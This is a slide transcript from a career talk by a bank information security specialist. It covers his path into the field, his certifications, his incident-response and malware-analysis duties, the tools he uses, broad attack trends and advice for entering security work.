Andrew Martin - Information Security Specialist, CIBC My Career in Information Security.
-
Upload
jewel-walsh -
Category
Documents
-
view
217 -
download
0
Transcript of Andrew Martin - Information Security Specialist, CIBC My Career in Information Security.
Andrew Martin - Information Security Specialist, CIBC
My Career in Information Security
AgendaMy backgroundPre-CIBC experience and qualificationsHow I got my current jobQualifications obtained at CIBCCurrent responsibilities ToolsAttacks Opportunities and how to be successful
BackgroundGraduated from CTY program in December
2003 before Seneca moved to YorkSpecialized in security Left the country in January 2004, missed my
convocation and traveled the South Pacific for 7 months
Pre-CIBC experience and qualificationsWorked for a friend’s small company
Home / SOHO clientsFirst exposure to security involved removing
viruses like Blaster, MyDoom, securing wireless networks, deploying home firewalls.
Got a job for Microsoft’s out sourced support company in Sydney, Australia when the Sasser worm hit in April 2004
Contract junior network admin for WSI in 2005Helped build a small data centerSecured their workstations, wireless access
points
Pre-CIBC experience and qualificationsCertifications
A+, Server +, Network +MCP in Windows 2003 administration
How I got my current jobWhile working at WSI I noticed a job posting
at CIBC for a desktop support analystApplied for and got the jobSupported CIBC’s trading floor staff
including traders, back office staff and some senior executives
Spent 8 months in desktop support
How I got my current jobNoticed a job opening in security group as an
analyst 24/7 support12 hour rotating shifts7AM-7PM / 7PM -7AM (terrible!)Monitor Intrusion Detection System (IDS) and
other security devicesPassion for security, enthusiasm and
willingness to learn got me the jobFantastic position to “get your foot in the door”
How I got my current jobExcelled at responsibilities as a shift analyst,
moved to 9-5 day job after 8 months (more responsibility, same pay )
My boss wanted to have someone working everyday who could find and investigate attacks
A new position was created for mePromoted to specialist a few months laterHave been in my current role for a little over
a year
Qualifications obtained at CIBCMCSA – 2003, specialized in securityCCNACISSPSANS:
GCFA Gold (Forensic Analyst) – Mobile Device Forensics
GCIH Gold(Incident Handler) – Exploit Kits Revealed – MPack
GREM (Reverse Engineering Malware)And my most recent…..
Qualifications obtained at CIBC One of 4 professionals world wide to obtain the
SANS GSE (Security Expert) Malware certification GCFA, GCIH, GREM were prerequisites, I needed to
write two papers to achieve gold status as well. The prereqs took over a year to complete
The testing included: A telephone interview 150 multiple choice questions 2 days (14 hours) of hands on lab assignments at the
SANS Las Vegas 2008 conference A written report
CIBC covered my expenses and flew me to Vegas to take it!
Current responsibilities Mentor and lead a team of 9 analysts Lead for maintaining CIBC’s Intrusion Detection System Influence direction of CIBC’s information security by
applying real world attack experience Research & investigate security threats to CIBC’s
infrastructure Reverse engineer malware (viruses) to determine their
capability Find, investigate and (sometimes) take down botnets Recover sensitive stolen information Assist corporate security and online fraud investigation
groups
ToolsFrom a high level
Anti virusIntrusion Detection SystemProxy + Web Filtering Log correlation engine
Tools For reverse engineering and malware analysis
Linux VMware Wireshark Perl, strings, file, netcat, hex editor Encase (Helix or SANS SIFT) Debugger – ollydbg Disassembler – IDA pro Mandiant red curtain PEiD Various unpackers Memory dumper (lordPE) Sysinterals tools – process explorer, process monitor Etc, etc
ToolsBar none, the MOST important tools for
conducting investigations are your “detective hat” and patience
You must always answer these questionsWhen was the system attacked?Who attacked the system? (IP address)How was it compromised?What was the purpose or payload of the
attack?
AttacksTrends
Client side attacks – Workstations are compromised via malicious websites typically via ActiveX controls
Server side attacks – Websites are compromised in the tens of thousands by SQL injection, remote file inclusion and stolen or weak passwords
Opportunities and how to be successful
To excel in security (technically) you should be at least competent in virtually every area of ITWindows administration ***Unix/Linux administration***Networking / firewall Development (scripting, programming)Databases / SQLHardware
Opportunities and how to be successful
From Tech Republic’s 2008 salary report (US) Top 30 job functions Security Specialist ranks 8th with avg salary of 85K
No I don’t make that much sadly
#1 - Executive Management (CEO SVP VP) $104,767 #2 - System Architect $100,734 #7 - Database Manager $87,261 #8 - Computer Security Specialist $85,699 #22 - Network Analyst $64,217 #30 - Help Desk Support $48,783
Opportunities and how to be successful
Information Security is a hot field, but hard to break into Hackers won’t stop hacking, they will only hack more.
There is lots of money being made by bad guys Two paths to take
1 – Work for a “Client” ex: CIBC 2 – Work for a “Vendor” ex: Symantec
Look for jobs with a company that is governed by regulations. These regulations will stipulate that they must have dedicated security staff and resources
Banks, insurance companies, health care providers, government
Take a job to “get your foot in the door”
Opportunities and how to be successful
“Soft” skills are incredibly valuableEnthusiasmWillingness to learnPublic speaking Ability to admit mistakesAbility to work in a team
Without strong soft skills your career will be severely limited
The most successful people are good at many things
Questions?